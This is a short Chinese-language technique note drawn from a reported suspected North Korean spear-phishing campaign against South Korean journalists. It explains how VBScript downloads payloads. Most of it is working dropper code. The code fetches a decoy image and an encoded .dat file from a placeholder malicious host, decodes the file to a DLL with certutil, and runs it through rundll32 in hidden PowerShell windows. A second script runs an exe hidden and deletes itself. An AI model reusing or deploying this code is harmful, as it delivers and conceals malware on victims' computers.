利用VBS下载EXE文件手法记录
1、信息来源
疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理
https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ
https://twitter.com/blackorbird/status/1082553543280680962
2、利用思路
1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下,通过【powershell Invoke-item】运行。
2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll
4、 通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。
3、实例代码
下载代码:
Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "\note.png"
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile docPath, 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true
docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send
with bStrm2
.type = 1 '//binary
.open
.write xHttp2.responseBody
.savetofile dir + "\svchow.dat", 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true
转码运行exe:
Dim fIn, fOut, sFilename, sBOM
sFilename = "C:\windows\temp\xxx.exe"
Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename
sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
If AscB(MidB(sBOM, 1, 1)) = 255 _
And AscB(MidB(sBOM, 2, 1)) = 254 Then
fIn.Position = 2 ' Skip BOM
Set fOut = CreateObject("adodb.stream")
fOut.Type = 1 'adTypeBinary
fOut.Mode = adModeReadWrite
fOut.Open
fIn.CopyTo fOut
fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
fOut.Flush
fOut.Close
Set shell = CreateObject("Wscript.Shell")
shell.Run "c:\windows\temp\xxx.exe",0,False
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(WScript.ScriptName)
End If